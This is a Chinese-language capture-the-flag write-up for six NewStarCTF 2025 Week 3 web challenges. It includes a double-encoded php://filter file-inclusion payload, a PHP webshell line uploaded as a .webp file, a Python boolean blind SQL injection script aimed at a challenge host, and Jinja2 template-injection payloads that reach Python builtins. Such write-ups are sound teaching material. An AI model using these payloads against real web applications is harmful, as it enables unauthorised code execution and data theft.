NewStarCTF2025-Week3-Web

目录

1、mygo!!!

2、ez-chain

3、小E的秘密计划

4、mirror_gate

5、白帽小K的故事（2）

6、who'ssti

---

1、mygo!!!

存在flag.php

直接用file协议读

2、ez-chain

URL+rot13编码绕过一下就行了

def double_encode(s):
    return ''.join('%25{:02x}'.format(ord(c)) for c in s)
s_root_flag = "php://filter/read=string.rot13/resource=/flag"
print(double_encode(s_root_flag))

Payload：

?file=%2570%2568%2570%253a%252f%252f%2566%2569%256c%2574%2565%2572%252f%2572%2565%2561%2564%253d%2573%2574%2572%2569%256e%2567%252e%2572%256f%2574%2531%2533%252f%2572%2565%2573%256f%2575%2572%2563%2565%253d%252f%2566%256c%2561%2567

3、小E的秘密计划

提示备份文件，直接试一下www.zip

提示git

找到用户名和密码：git cat-file -p f3d34d7cb96b5bcdcda980a1413d2e35154e98de

提示mac写的这段代码

应该存在DS 泄露，访问 .DS_Store

拿到文件名之后访问即可看到flag

4、mirror_gate

源码里看到提示

扫描一下，存在配置文件

会将 .webp 的文件当做php解析

直接传，内容稍作绕过即可：

<?=`tac /f*`?>

5、白帽小K的故事（2）

提示盲注

很明显可以看到回显不同

布尔盲注

过滤了空格，用括号换个写法就行了

flag不在当前数据库，在Flag数据库

表名和字段名都是flag

Exp：

# author:My6n

import requests
import string

url = 'https://eci-2zefxfrs15rs8gpgz6j6.cloudeci1.ichunqiu.com:80/search'
dic = string.digits+string.ascii_letters+'{}-_,'
out = ''
Cookie = {'Cookie':'Hm_lvt_2d0601bd28de7d49818249cf35d95943=1759757336,1759973191,1760016294,1760146947'}
for j in range(1,80):
    for k in dic:
        #payload = {"name":"amiya'&&if(substr(database(),1,1)='t',1,0)#"}
        #payload = {"name":f"amiya'&&if(substr((select(group_concat(schema_name))from(information_schema.schemata)),{j},1)='{k}',1,0)#"}
        #payload = {"name":f"amiya'&&if(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='Flag')),{j},1)='{k}',1,0)#"}
        #payload = {"name": f"amiya'&&if(substr((select(group_concat(column_name))from(information_schema.columns)where((table_schema='Flag')and(table_name='flag'))),{j},1)='{k}',1,0)#"}
        payload = {"name": f"amiya'&&if(substr((select(flag)from(Flag.flag)),{j},1)='{k}',1,0)#"}
        re = requests.post(url, data=payload ,cookies=Cookie)
        #print(re.text)
        if "ok" in re.text:
            out += k
            break
    print(out)

6、who'ssti

提交的内容会被Jinja2 当作模板渲染

调用到随机生成的那些函数就可以了

Payload：

{{ lipsum.__globals__.__builtins__.__import__('re').findall('a.', 'abcab') }}

{{ lipsum.__globals__.__builtins__.__import__('difflib').get_close_matches('apple', ['ape','april','apple']) }}

{{ lipsum.__globals__.__builtins__.__import__('random').choice([1,2,3,4]) }}

{{ lipsum.__globals__.__builtins__.__import__('json').load(lipsum.__globals__.__builtins__.__import__('io').StringIO('{"a":1}')) }}

{{ lipsum.__globals__.__builtins__.__import__('statistics').fmean([1,2,3,4]) }}